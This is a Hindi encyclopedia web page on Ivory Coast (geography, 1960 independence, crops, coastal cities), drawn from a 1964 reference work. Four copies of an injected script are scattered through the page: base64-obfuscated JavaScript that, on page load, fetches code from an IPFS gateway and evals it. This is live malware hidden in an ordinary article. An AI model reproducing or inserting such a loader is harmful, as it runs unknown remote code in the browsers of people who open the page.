आइवरी कोस्ट

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

चित्र:Tranfer-icon.png यह लेख परिष्कृत रूप में भारतकोश पर बनाया जा चुका है। भारतकोश पर देखने के लिए यहाँ क्लिक करें

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

लेख सूचना
आइवरी कोस्ट
पुस्तक नाम हिन्दी विश्वकोश खण्ड 1
पृष्ठ संख्या 335
भाषा हिन्दी देवनागरी
संपादक सुधाकर पाण्डेय
प्रकाशक नागरी प्रचारणी सभा वाराणसी
मुद्रक नागरी मुद्रण वाराणसी
संस्करण सन्‌ 1964 ईसवी
उपलब्ध भारतडिस्कवरी पुस्तकालय
कॉपीराइट सूचना नागरी प्रचारणी सभा वाराणसी
लेख सम्पादक डॉ. कैलाशचंद्र शर्मा

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

आइवरी कोस्ट एक गणतंत्र राष्ट्र है। अफ्रीका महाद्वीप में यह लाइबेरिया तथा घाना के बीच स्थित है। गिनी, माली तथा अपर वोल्टा नामक देशों से इस देश की सीमाएँ मिलती हैं। इसका क्षेत्रफल 3,22,463 वर्ग किलोमीटर है और जनसंख्या (1965 की जनगणना के अनुसार) 38,40,000। उक्त जनसंख्या में 15 हजार यूरोप निवासी भी सम्मिलित हैं। इसके तटवर्ती क्षेत्र की लंबाई 608 किलोमीटर है।

फ्रांस ने 1842 ई. में आइवरी कोस्ट पर अधिकार कर लिया था किंतु नियमित फ्रांसीसी शासन वहाँ 1882 ई. में प्रारंभ हुआ। 7 अगस्त, 1960 के दिन इस देश ने स्वतंत्रता प्राप्त की और 20 सितंबर, 1960 को इसे राष्ट्रसंघ का सदस्य बना लिया गया।

नारियल, रबड़ तथा महोगनी यहाँ काफी मात्रा में उपलब्ध होते हैं। कमोय तथा बिया नादियों में सोना मिलता है। केला, अनन्नास, मूँगफली, मक्का, गेहूँ, रुई, चावल तथा कोको यहाँ के प्रमुख पैदावार हैं। यहाँ से काफी का निर्यात पर्याप्त होता है।

आइवरी कोस्ट के लगभग सभी प्रमुख नगर तटवर्ती इलाके में ही स्थित हैं। ग्रांड लाहऊ, ग्रांड बस्सम, एस्सिनी, सस्साद्रं और अबिदजान (आइवरी कोस्ट की राजधानी) इत्यादि नगर समुद्रतट पर ही हैं। केवल कांग एवं सकल नाम के नगर देश के मध्यवर्ती क्षेत्र में बसे हैं।



टीका टिप्पणी और संदर्भ